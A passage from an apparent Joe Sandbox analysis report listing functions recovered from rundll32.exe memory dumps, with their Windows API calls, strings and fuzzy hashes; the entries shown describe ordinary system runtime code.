Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: Process$AppendCurrentDirectoryErrorFormatHeaderImageLastLibraryLoadMessageMitigationPathPolicyProcess2SystemWow64
String ID: `(u
API String ID: 4162338769-2040362809
Opcode ID: 57a62d7b6df4a915752e7099e9b4d7ce7402c00fe8132daa3ab240f739c423a0
Instruction ID: 7544a223d0b42f4c72f5e8da750c59c4b3e07da95ac5b9c106f6cfb310364573
Opcode Fuzzy Hash: 57a62d7b6df4a915752e7099e9b4d7ce7402c00fe8132daa3ab240f739c423a0
Instruction Fuzzy Hash: 8B21A471A4121C6FFF10DB619C89FFB76BDEBC4700F108469B509D21D1DAB08F458A61

Function 00A048B7 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?), ref: 00A04925
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?), ref: 00A04936
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00A0495D
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 00A04964

Strings

`(u, xrefs: 00A04925

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: ErrorHeapLast$FreeProcess
String ID: `(u
API String ID: 1234203156-2040362809
Opcode ID: 2eeefe9dd576031af25856f2cc34ed79470b895c8a0ef353358c42ba7b44cb67
Instruction ID: 542d5158bb808db099a14872ab8f31b705199e886eddb9f4d6ddc8c4bc703966
Opcode Fuzzy Hash: 2eeefe9dd576031af25856f2cc34ed79470b895c8a0ef353358c42ba7b44cb67
Instruction Fuzzy Hash: B721A4B150011CDBCB11AFA0FD85A6FB769BF897457044164F6019B196DB309D06D7E1

Function 00A06735 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00A06762
GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00A06771
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00A0677A
GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00A06783
QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00A06798

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 1242ba8a5b5cda7b53ae2e6b71d59162524fd433eb6a4a4ceb9dae278922d413
Instruction ID: 45731ed3a7a51c1d210b5522f97344f20737ee16ef0067fe12a480966e4e5ebc
Opcode Fuzzy Hash: 1242ba8a5b5cda7b53ae2e6b71d59162524fd433eb6a4a4ceb9dae278922d413
Instruction Fuzzy Hash: BF112571E0020CABCF10DFF8EA4869EB7F5EF48314F5148A9D402E7260EB349B069B54

Function 00A061C0 Relevance: 6.0, APIs: 4, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00A062F6,00A01000), ref: 00A061C7
UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00A062F6,?,00A062F6,00A01000), ref: 00A061D0
GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00A062F6,00A01000), ref: 00A061DB
TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00A062F6,00A01000), ref: 00A061E2

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 4c44688dfe7514ae6faeff63a456b89c07bc1cdd1d7c6a109bd4392c7adb7c11
Instruction ID: e979b88ae40d7ff90391d084f6745f7c7a13e0d7f5184c47f6e684731558b767
Opcode Fuzzy Hash: 4c44688dfe7514ae6faeff63a456b89c07bc1cdd1d7c6a109bd4392c7adb7c11
Instruction Fuzzy Hash: F0D0C93254010CBBDB40AFE1EC0DA0A3E28FB48312F044510F34A82022CB314403CB61

Function 00A025B2 Relevance: 4.7, APIs: 3, Instructions: 187threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00000000), ref: 00A0265E
IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0 ref: 00A02737
OutputDebugStringW.API-MS-WIN-CORE-DEBUG-L1-1-0(?), ref: 00A027A1

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: CurrentDebugDebuggerOutputPresentStringThread
String ID:
API String ID: 4268342597-0
Opcode ID: 27effea1d14805214f16b79aa68a0ae157970c11a39ffa9c218e5550b79bb23d
Instruction ID: f9143550178b4de11db30cbeca850f1e4c5154e713633ecc642c14ce5eb29bd6
Opcode Fuzzy Hash: 27effea1d14805214f16b79aa68a0ae157970c11a39ffa9c218e5550b79bb23d
Instruction Fuzzy Hash: 88617B3560070D9FCB25DF68E84876ABBF6FF88710F15442AE84AD72A1DB35E802CB55

Function 00A0205A Relevance: 1.5, APIs: 1, Instructions: 33comCOMMON

Download Yara Rule

APIs

CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(00A0161C,00000000,00000001,00A01940,?), ref: 00A02072

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: d67e596ab0a9909b6cb8b217eb9a4bc3c7684a2ddf6c6016f0ff2442ca4a7d8d
Instruction ID: 1b7ddac13e89a21d4d74d35b4ce8b6ddb7acf1841a0c54500d50fac99790ad5d
Opcode Fuzzy Hash: d67e596ab0a9909b6cb8b217eb9a4bc3c7684a2ddf6c6016f0ff2442ca4a7d8d
Instruction Fuzzy Hash: 95F0823574021CBFCB00DB94DC45FCE7769EB88750F140055FA06E72D1CAA1AE02CB90

Function 00A06510 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_000064C0), ref: 00A06515

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 7acd85268e18f5b8db26ce0d6aae975dd26663a47566f88301c54056bfea2dcf
Instruction ID: 255f97592f4ab2cee18c3ce1b19c855e6a396860cf3191bcb4f190be3cdba773
Opcode Fuzzy Hash: 7acd85268e18f5b8db26ce0d6aae975dd26663a47566f88301c54056bfea2dcf
Instruction Fuzzy Hash: 1C90026065250896C6406FB07D4D50665A07A48B2F7420950A006C4195DA5241179511

Function 00A05911 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 258COMMON

Download Yara Rule

APIs

PathIsRelativeW.API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0(?,00000000,00000000,00000000), ref: 00A05932
RtlSetSearchPathMode.NTDLL(00008001), ref: 00A05945
SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,00000104,?,?), ref: 00A05961
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?), ref: 00A059BF
CreateActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(00000020,?,?), ref: 00A059D1
CreateActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(00000020,?,?), ref: 00A05A17
CreateActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(00000020,?,?), ref: 00A05A38
CreateActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(00000020,?,?), ref: 00A05A59
GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?), ref: 00A05A98
CreateActCtxW.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(?,?,?), ref: 00A05AB5
ActivateActCtx.API-MS-WIN-CORE-SIDEBYSIDE-L1-1-0(?,00000000,?,?), ref: 00A05AF3
memset.MSVCRT ref: 00A05BA7
CompareStringW.API-MS-WIN-CORE-STRING-L1-1-0(0000007F,00000001,?,000000FF,IME,000000FF), ref: 00A05BD7

Strings

.manifest, xrefs: 00A059A8
, xrefs: 00A0597D
, xrefs: 00A05AAB
IME, xrefs: 00A05BC5
|, xrefs: 00A05A2D
N, xrefs: 00A05B39

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: Create$Path$Search$ActivateAttributesCompareFileHandleModeModuleRelativeStringmemset
String ID: $ $.manifest$IME$N$|
API String ID: 1902760705-3161873098
Opcode ID: 03c1f7329cb48c9da68448bf9e6c7cc66fe45ce18937a887503320243b135cf5
Instruction ID: a8efe1af0f45789319220795351caf9efe6ca3eeff5813b083dd3fb1f67f93b7
Opcode Fuzzy Hash: 03c1f7329cb48c9da68448bf9e6c7cc66fe45ce18937a887503320243b135cf5
Instruction Fuzzy Hash: 1A91A171A0061DAFDB20EFB4ED8CB9B77B8AB45321F1042A5F519E21D0E77499468F60

Function 00A03B09 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 107processsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00A03A51: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00A03A7B
Part of subcall function 00A03A51: memset.MSVCRT ref: 00A03A8F
Part of subcall function 00A03A51: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000040,?,00000000,00000000), ref: 00A03AA6
Part of subcall function 00A03A51: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000), ref: 00A03AC1
Part of subcall function 00A03A51: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,000000F8,?,00000000), ref: 00A03AE1
Part of subcall function 00A03A51: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00A03AF3

GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00A03B39
IsWow64Process2.API-MS-WIN-CORE-WOW64-L1-1-1(00000000), ref: 00A03B40
GetSystemDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,000000F6), ref: 00A03B6C
PathCchAppend.API-MS-WIN-CORE-PATH-L1-1-0(?,00000105,rundll32.exe), ref: 00A03B87
RtlWow64IsWowGuestMachineSupported.NTDLL ref: 00A03BA9
GetSystemWow64Directory2W.API-MS-WIN-CORE-WOW64-L1-1-1(?,000000F6,?), ref: 00A03BC9
Wow64EnableWow64FsRedirection.API-MS-WIN-CORE-KERNEL32-PRIVATE-L1-1-0(00000000), ref: 00A03BD4
memset.MSVCRT ref: 00A03BE6
GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00A03C08
CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000), ref: 00A03C16
Wow64EnableWow64FsRedirection.API-MS-WIN-CORE-KERNEL32-PRIVATE-L1-1-0(00000001), ref: 00A03C20
WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF), ref: 00A03C36
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00A03C44
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00A03C50

Strings

P&u, xrefs: 00A03C44, 00A03C50
rundll32.exe, xrefs: 00A03B76

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: Wow64$File$CloseHandle$CreateEnableProcessReadRedirectionSystemmemset$AppendCommandCurrentDirectoryDirectory2GuestLineMachineObjectPathPointerProcess2SingleSupportedWait
String ID: P&u$rundll32.exe
API String ID: 1294557600-1468930581
Opcode ID: 66960c526f0c35c9e9ecbed86740e82d58a9293cf88c66136bde2ebe2cc9358d
Instruction ID: 428789558a2a58ffa8889212c54ceedf48c9d295c3125d36b9e4a1ae046f4651
Opcode Fuzzy Hash: 66960c526f0c35c9e9ecbed86740e82d58a9293cf88c66136bde2ebe2cc9358d
Instruction Fuzzy Hash: 45317072A0112DABDF61DBA4AC8DFEB7B7CAB05704F0001A5E50AD2091DB349B86DB90

Function 00A02100 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 165windowthreadCOMMON

Download Yara Rule

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000), ref: 00A021D8
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00A0223F

Strings

[%hs(%hs)], xrefs: 00A022BE
LogHr, xrefs: 00A02192
FailFast, xrefs: 00A02186
[%hs], xrefs: 00A022D8
ReturnHr, xrefs: 00A0219E
Msg:[%ws] , xrefs: 00A0228B
CallContext:[%hs] , xrefs: 00A022A3
Exception, xrefs: 00A021AA
(caller: %p) , xrefs: 00A02224
%hs!%p: , xrefs: 00A0220A
%hs(%d) tid(%x) %08X %ws, xrefs: 00A0224F
, xrefs: 00A02273
%hs(%u)\%hs!%p: , xrefs: 00A021F9

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: CurrentFormatMessageThread
String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
API String ID: 2411632146-3173542853
Opcode ID: b174089d6096a3643285a25e3aa36b628a8f18cc8aff97b7ea0919e6a3d4590e
Instruction ID: 35029db3f6dd7e47372d6efb8c644c2650c18bded9af35f7c8b003cdfbf5e42d
Opcode Fuzzy Hash: b174089d6096a3643285a25e3aa36b628a8f18cc8aff97b7ea0919e6a3d4590e
Instruction Fuzzy Hash: 7151E271A0030CBBDB349FA5AC4DFA7B7B9EB58700F044A5DF146921E2DA729D90CB61

Function 00A037C3 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 102threadCOMMON

Download Yara Rule

APIs

CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000002), ref: 00A037D4
CoInitializeSecurity.API-MS-WIN-CORE-COM-L1-1-0(00A019CC,00000000,00000000,00000000,00000000,00000000,00000000,00000008,00000000), ref: 00A037F0
CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0 ref: 00A038E7

Part of subcall function 00A0205A: CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(00A0161C,00000000,00000001,00A01940,?), ref: 00A02072

CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000001,00000000,00000000), ref: 00A03808
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00A0381D

Part of subcall function 00A053AD: InitOnceExecuteOnce.API-MS-WIN-CORE-SYNCH-L1-2-0(00A084A4,00A053D0,00000000,00000000,00A0382A), ref: 00A053BB

CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?), ref: 00A03866
SetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00A03873
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00A0387A
CoWaitForMultipleHandles.API-MS-WIN-CORE-COM-L1-1-0(00000000,00007530,00000001,00A08420,?), ref: 00A03897
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00A038D9

Strings

P&u, xrefs: 00A0387A, 00A038D9

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: CreateEvent$CloseHandleInitializeOnce$CurrentExecuteHandlesInitInstanceMultipleSecurityThreadUninitializeWait
String ID: P&u
API String ID: 2536006573-3268923125
Opcode ID: 3b14f11d70353908c826bc5937037b32f70db91950cf68e1d73c90b80840afc9
Instruction ID: d0c21b0c6662b53bfd51c9b7ea48dd318d91955b843e79fdc6007f18be398ee7
Opcode Fuzzy Hash: 3b14f11d70353908c826bc5937037b32f70db91950cf68e1d73c90b80840afc9
Instruction Fuzzy Hash: 7031437260070DAFEB109FF4AD8CEAB7ABCFB44745B004469F54692191DBB9D90B8724

Function 049A2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 049A293C
___swprintf_l.LIBCMT ref: 049A295E
___swprintf_l.LIBCMT ref: 049A29A3
___swprintf_l.LIBCMT ref: 049DA52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 049DA54E
::%hs%u.%u.%u.%u, xrefs: 049DA527
ffff:, xrefs: 049DA504
:%u.%u.%u.%u, xrefs: 049DA5B8

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 71f360162e71e5149cb3e08507a6e71ac0531e5f8d73b1a3cf38d74d0c2abe86
Instruction ID: 7280fe288aa8cab603d5fb64d8d254b64dd87bcb1f859159bb24a3a6c5fc1f08
Opcode Fuzzy Hash: 71f360162e71e5149cb3e08507a6e71ac0531e5f8d73b1a3cf38d74d0c2abe86
Instruction Fuzzy Hash: AD51C7B6A00116BFDB20DF98899097EF7B8BB88604B14C579E495D7741E234FE60CBE1

Function 04A12410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04A124A6
___swprintf_l.LIBCMT ref: 04A124E2
___swprintf_l.LIBCMT ref: 04A1257D
___swprintf_l.LIBCMT ref: 04A125A3
___swprintf_l.LIBCMT ref: 04A125C8
___swprintf_l.LIBCMT ref: 04A12608

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 04A124DA
::%hs%u.%u.%u.%u, xrefs: 04A1249E
:%u.%u.%u.%u, xrefs: 04A125FF
ffff:, xrefs: 04A1247D, 04A1249D

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 856ec430d95d3206e89cbb454a90ae00287cb13e775937af18983400dce3cefb
Instruction ID: 6d4108a3ae1aa6105cd8b4840eb5788dd650c295aa7e9ffc3e4ccf0cb8d96cca
Opcode Fuzzy Hash: 856ec430d95d3206e89cbb454a90ae00287cb13e775937af18983400dce3cefb
Instruction Fuzzy Hash: C6513C72A006456FDB30DF5CC990A7FB7F8DF88204B1484A9E4D6E7651E6B8FA00C760

Function 00A038F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 116fileCOMMON

Download Yara Rule

APIs

LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,000000C8), ref: 00A0391E
LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000402,?,000000C8,?,000000C8), ref: 00A03963
CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(CONOUT$,C0000000,00000003,00000000,00000003,00000000,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00A03992
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,?,?,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00A039D0
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,00A01844,00000002,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00A039E6
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000001,?,?,?,00000000,?,00000402,?,000000C8,?,000000C8), ref: 00A03A15
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000001,?,00000402,?,000000C8,?,000000C8), ref: 00A03A1C

Strings

P&u, xrefs: 00A03A1C
CONOUT$, xrefs: 00A0398D

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: ConsoleWrite$LoadString$CloseCreateFileHandle
String ID: CONOUT$$P&u
API String ID: 258192622-2938381751
Opcode ID: c3031990447438ec2b63b1483a3727a2457d827b946959ab70824d54cd66d3db
Instruction ID: e393868aefa5e2fdcb27126273387346e53c79ab04d7d11748da294edea2b344
Opcode Fuzzy Hash: c3031990447438ec2b63b1483a3727a2457d827b946959ab70824d54cd66d3db
Instruction Fuzzy Hash: C331A03260011DABEB20DB64DD49FEB777CEB45B40F048095FA4A96181E670AF0ACE60

Function 00A02B5A Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 100synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?), ref: 00A02B6D

Strings

`(u, xrefs: 00A02BD0, 00A02C1C

Memory Dump Source

Source File: 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000008.00000002.4540434284.0000000000A09000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000008.00000002.4540502600.0000000000A0C000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a00000_rundll32.jbxd

Similarity

API ID: ObjectSingleWait
String ID: `(u
API String ID: 24740636-2040362809
Opcode ID: 64eeefdb16e9a349e8f768a2de82a7295a5f1d79527a58a0dd025eaafb7b63e4
Instruction ID: ddce458bade9925d9d809ee8398b0c51c72c8bda7203fafb1cb3c4373b6cc68f
Opcode Fuzzy Hash: 64eeefdb16e9a349e8f768a2de82a7295a5f1d79527a58a0dd025eaafb7b63e4
Instruction Fuzzy Hash: 19314930A0031EABFB249BA1AC8CBAF3669EF45355F204126F506D62D1D674CD429792

Function 04997630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 049D46FC
ExecuteOptions, xrefs: 049D46A0
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 049D4742
Execute=1, xrefs: 049D4713
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 049D4655
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 049D4725
CLIENT(ntdll): Processing section info %ws..., xrefs: 049D4787

Memory Dump Source

Source File: 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true

Associated: 00000008.00000002.4541336053.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4930000_rundll32.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 18eb361314c168f908eb0f85492fcee61c21f785aeb5329e7d8bff072c60bad5
Instruction ID: b98cdc7d1e035e7d64501880df18c2df36d0418bd7dfb12f4319cbc1deac2070
Opcode Fuzzy Hash: 18eb361314c168f908eb0f85492fcee61c21f785aeb5329e7d8bff072c60bad5
Instruction Fuzzy Hash: E251F431610219BBEF10AEE8DC89FAA77ECABC4304F0404F9E505AB180EB71BE41CE51

Function 00A03A51 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68fileCOMMON

